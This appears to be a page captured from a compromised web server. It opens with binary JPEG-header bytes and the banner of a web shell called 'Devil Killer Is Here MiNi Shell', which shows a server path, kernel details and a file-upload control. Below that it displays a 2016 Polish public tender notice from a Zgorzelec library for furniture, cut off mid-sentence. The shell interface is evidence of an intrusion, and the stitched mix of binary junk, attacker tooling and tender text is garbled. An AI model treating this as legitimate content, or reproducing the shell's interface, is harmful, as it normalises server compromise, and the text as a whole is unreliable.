JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160330/71268-N-2016.html

<p class="kh_header"><b>Zgorzelec: Przebudowa i adaptacja pomieszczeń na potrzeby biblioteki multimedialnej - dostawa wyposażenia meblowego</b><br>
<b>Numer ogłoszenia: 71268 - 2016; data zamieszczenia: 30.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Biblioteka Publiczna , ul. Boh. Getta 1, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 7752557, faks 0-75 7713315.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.biblioteka-zgorzelec.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowe Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i adaptacja pomieszczeń na potrzeby biblioteki multimedialnej - dostawa wyposażenia meblowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa wraz z wniesieniem i montażem nowych, nieużywanych, pełnowartościowych, niewadliwych, dopuszczonych do użytku zgodnie z obowiązującymi przepisami oraz wolnych od wad fizycznych i prawnych, tj. nieobciążonych prawami osób trzecich, mebli i wyposażenia lokalu znajdującego się w parterze budynku mieszkalnego wielorodzinnego położonego na działce nr 67/7, Obręb XI, AM 3 przy ul. Orzeszkowej 30A, przebudowywanego na potrzeby Biblioteki Multimedialnej w Zgorzelcu.
2.   Szczegółowy zakres dostawy, opis techniczny mebli i wyposażenia oraz szczegółowe rysunki mebli i wyposażenia dodatkowego oraz wymagania Zamawiającego w zakresie dokumentów, potwierdzających spełnienie przez materiały użyte na meble oraz wyposażenie wymagań określonych przez Zamawiającego zawiera SIWZ do postępowania.
3.	Opis przedmiotu zamówienia jest komplementarny w stosunku do projektu aranżacji wnętrz 
uwzględniając lokalizację elementów umeblowania i wyposażenia dodatkowego,  stanowiących przedmiot dostawy do lokalu znajdującego się w parterze budynku mieszkalnego wielorodzinnego położonego na działce nr 67/7, Obręb XI, AM 3 przy ul. Orzeszkowej 30A przebudowywanego na potrzeby  Biblioteki Multimedialnej w Zgorzelcu. Przy przygotowaniu oferty oraz wykonywaniu elementów wyposażenia trzeba uwzględnić rysunki techniczne wraz z zawartymi w nich wskazówkami materiałowymi (Szczegółowe rysunki mebli i wyposażenia dodatkowego stanowią załącznik nr 1 do  SIWZ).
4.	Dla należytego wykonania przedmiotu zamówienia, wszystkie wymiary mebli należy zweryfikować 
podczas wizji lokalnej obiektu przed rozpoczęciem wykonywania poszczególnych elementów wyposażenia meblowego. Wizja lokalna będzie możliwa po zakończeniu robót budowlanych, które to zakończenie robót Zamawiający określa na 01.07.2016 r. Możliwe różnice w wymiarach mebli w stosunku do wymiarów mebli określonych w załączniku nr 1 do SIWZ (Szczegółowe rysunki mebli i wyposażenia), Zamawiający określa 
jako +/- 3%. Zamawiający nie przewiduje w związku z tym podwyższenia wynagrodzenia Wykonawcy ponad kwotę określoną przez Wykonawcę na formularzu ofertowym stanowiącym załącznik nr 2 do  SIWZ.
5.	Szczegółowe dyspozycje co do typu i kolorystyki wykorzystanych materiałów należy ustalić z Zamawiającym (i Projektantem) na etapie wykonawstwa. Zamawiający zastrzega sobie wybór oferowanej kolorystyki meblowej z pośród minimum 3 kolorów - w cenie oferty bez dodatkowych dopłat. Wzornik kolorystyki należy dostarczyć przed realizacją zamówienia. Dotyczy to zarówno płyt meblowych jak i tkanin mebli tapicerowanych.
6.	Do wyceny oferty należy  przyjąć meble o wymiarach zawartych w załączniku nr 1 do SIWZ
(Szczegółowe rysunki mebli i wyposażenia dodatkowego).
7.	Blaty robocze mebli muszą być wykonane z płyty wiórowej trzywarstwowej wg PN-EN 14322, o grubości 28mm / 18mm, obustronnie laminowanej z krawędziami bocznymi wykończonymi obrzeżem, kolorem odpowiadającym kol. płyty. Gęstość płyty w zakresie 650-690 kg/m3,  klasa higieniczności E1. 
8.	Korpusy szaf muszą być wykonane z płyty wiórowej trzywarstwowej o gr. 18 mm, wg PN-EN 14322, dwustronnie laminowanej z krawędziami bocznymi wykończonymi obrzeżem, kolorem odpowiadającym kol. płyty. Gęstość płyty w zakresie 650-690 kg/m3. Klasa higieniczności E1.
9.	Wieńce górne i dolne muszą być wykonane z trzywarstwowej płyty, o gr. 18mm, dwustronnie laminowanej wg PN-EN 14322. Gęstość płyty w zakresie 650-690 kg/m3. Krawędzie boczne wykończone obrzeżem PCV, w kolorze płyty.  Klasa higieniczności E1.
10.	Plecy mają być wykonane z trzywarstwowej płyty o gr. 8mm / 18mm,  wg PN-EN 14322, wpuszczane w boki  i wieńce, dwustronnie laminowanej, z krawędziami bocznymi wykończonymi obrzeżem PCV o gr. 2 mm w kolorze płyty. Gęstość płyty w zakresie 650-690 kg/m3. Klasa higieniczności E1.
11.	Półki w szafach z mają być wykonane z płyty o grubości min. 18 mm. trzywarstwowej, wg PN-EN 14322, dwustronnie laminowanej z krawędziami bocznymi wykończonymi obrzeżem, kolorem odpowiadającym kol. płyty. Gęstość płyty w zakresie 650-690 kg/m3. Klasa higieniczności E1.
12.	Rozstaw między półkami powinien mieć możliwość regulacji. Mocowanie zapadkowe uniemożliwiające
przypadkowe wysunięcie półki.
13.	Meble mają być montowane na mimośrody (trzpienie metalowe z gwintem połączone z mimośrodem
obrotowym, zaślepki PCV).
14.	Nie dopuszcza się łączenia płyt za pomocą konfirmatorów oraz narożników PCV.
15.	Nogi regałów, szaf, biurek wyposażone muszą być w w stopki umożliwiające poziomowanie.
16.	Po zmontowaniu i ustawieniu mebli mebli Zamawiający wskaże miejsca wykonania otworów 
przelotowych w blatach stanowisk komputerowych i innych elementach wyposażenia wnętrza.
17.	Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu do wyboru i akceptacji minimum 3
wzorów  uchwytów do elementów meblowych wyposażenia.
18.	Wszystkie szafy meblowe mają być zamykane na klucz. 
19.  Wykonawca, jako wytwórca odpadów w rozumieniu art. 3 ust. 1 pkt. 32 ustawy o odpadach z dnia    
14.12.2012 r., (Dz. U. 2013 poz. 21 z późn. zm.) ma obowiązek zagospodarowania odpadów  powstałych podczas realizacji zamówienia zgodnie z wyżej wymienioną ustawą, ustawą z dnia 27.04.2001r. Prawo Ochrony Środowiska (tj. z 2013 r. Dz. U. poz. 1232 z późn.zm.) oraz ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2013 r., poz. 1399 ze zm.) 
22.  Wymagany okres gwarancji:
Na dostarczone w ramach tego zamówienia meble i wyposażenie okres rękojmi wynosi  24 miesiące licząc od dnia podpisania przez Zamawiającego protokołu odbioru dostawy bez uwag . 
Okres gwarancji Wykonawca określi w ofercie, przy czym nie może być on krótszy niż 24 miesiące.
23.  Zadanie dofinansowane ze środków Ministra Kultury i Dziedzictwa Narodowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.50.00-3, 39.13.00.00-2, 39.11.00.00-6, 79.93.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca wniesie wadium w wysokości 4300,- zł przed upływem terminu składania    
           ofert, tj. przed 07.04.2016 r. godz. 12:30
       2. W zależności od decyzji Wykonawcy wadium może być wnoszone w formach:
           a) pieniądzu (przelew na rachunek bankowy wskazany przez Zamawiającego),
           b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
               kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
           c) gwarancjach bankowych,
           d) gwarancjach ubezpieczeniowych,
           e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z   
              dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. 
              U. z 2007 r. Nr 42, poz. 275 ze zm.).
       3. W przypadku wnoszenia wadium w formach, o których mowa w pkt. 2  lit. od b do e oryginał 
           gwarancji/poręczenia należy umieścić w ofercie w sposób umożliwiający jego zwrot zgodnie z 
           zapisami ustawy Prawo Zamówień Publicznych.
       4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 
           Zamawiającego Nr 41 1160 2202 0000 0002 2366 9941 z zaznaczeniem
           Wadium do postępowania nr MBP.271.01.2016 /kopię przelewu (wpłaty) proszę dołączyć 
            do oferty/.	
           Skuteczne wniesienie wadium następuje w chwili uznania (zaksięgowania) kwoty wadium na  
           rachunku bankowym Zamawiającego, co oznacza, iż wadium musi znaleźć się na rachunku 
           Zamawiającego najpóźniej do dnia oraz godziny wyznaczonych jako termin składania ofert.
       5. Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie 
            wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie uznana za 
            odrzuconą zgodnie z art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.
       6.  Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty 
            najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta 
            została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.7.
        7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na 
            wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, z przyczyn 
            leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 
            ust. 1 ustawy Prawo Zamówień Publicznych, pełnomocnictw, listy podmiotów należących do 
            tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień 
            Publicznych lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody 
            na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy Prawo Zamówień 
            Publicznych, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę 
            jako najkorzystniejszej.
       8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z 
           umowy rachunku bankowego, na którym było ono przechowywane,  pomniejszone o koszty 
           prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy 
           wskazany przez Wykonawcę.
      9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
          wybrana:
          a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych   
             w ofercie,
          b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
          c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
             leżących po stronie wykonawcy.
    10. W przypadku wniesienia wadium w formach wymienionych w pkt. 2  lit. od b do e 
           z treści dokumentu dot. Wadium musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy 
          gwarancyjnej nastąpi także w przypadku określonym w pkt. 7 
    11. Wadium do postępowania wniesione tylko przez jednego z Wykonawców, o których mowa w 
          pkt. VIII  SIWZ uważa się za wniesione prawidłowo w imieniu wykonawców wspólnie 
          ubiegających się o udzielenie zamówienia.
    12. Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny 
           i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. XIII ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca oprócz złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt. XIII ppkt. 2 SIWZ, złoży również wskazany w pkt. XIII ppkt. 6 SIWZ, wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych, głównych dostaw zgodnych z przedmiotem zamówienia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane wraz z załączeniem dowodów, czy zostały one wykonane lub są wykonywane należycie. Zamawiający żąda wykazania w wykazie minimum 2 dostaw mebli drewnianych (w tym indywidualnych zabudów bez dodatkowych urządzeń ujętych w tych zabudowach) o łącznej wartości tych dostaw min. 100.000,- PLN netto.
Zamawiający informuje, iż w przypadku gdy Wykonawca przedstawi w wykazie dostaw,  kwotę wyrażoną w innej walucie niż PLN, Zamawiający do oceny spełniania warunku przyjmie średni kurs tej waluty w stosunku do PLN publikowany przez NBP z dnia otwarcia ofert.
Dowodami, o których mowa w powyżej są:
- poświadczenia, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub
ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze  Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, o którym mowa powyżej, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania niniejszych dowodów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o   którym mowa w pkt. XIII  ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt. XIII ppkt. 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w zakresie sposobu dokonywania oceny powyższego  warunku. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o   którym mowa w pkt. XIII  ppkt. 2 niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>minimum 2 dostawy mebli drewnianych (w tym indywidualnych zabudów bez dodatkowych urządzeń ujętych w tych zabudowach) o łącznej wartości tych dostaw min. 100.000,- PLN netto;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 2 do SIWZ, 
2.	Pisemne zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów,  na potrzeby
       wykonania zamówienia - załącznik nr 7 SIWZ,
3.   Ewentualne pełnomocnictwo do podpisania oferty i jej załączników, zgodnie z zapisami pkt. 8  SIWZ, o ile prawo do 
      podpisywania oferty nie wynika z innych dokumentów złożonych wraz z ofertą,
4.  Formularz oświadczenia dot. podwykonawstwa - załącznik nr 8 do SIWZ.
    W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że 
    Wykonawca wykona zamówienie własnymi siłami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-   Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku wystąpienia opóźnień w realizacji robót budowlanych w lokalu znajdującym się w parterze budynku mieszkalnego wielorodzinnego położonego na działce nr 67/7, Obręb XI, AM 3 przy ul. Orzeszkowej 30A, przebudowywanego na potrzeby Biblioteki Multimedialnej w Zgorzelcu mających wpływ na termin realizacji przedmiotu umowy. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami,
-   Przesunięcie terminu realizacji zamówienia możliwe będzie z przyczyn losowych, w przypadku 
wystąpienia działania siły wyższej, mającej bezpośredni wpływ na terminowość wykonywania  przedmiotu umowy. Pod pojęciem siły wyższej Zamawiający rozumieć będzie zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności.Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, promieniowanie, lub skażenia. W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno  minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami,
-   Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku zmiany powszechnie 
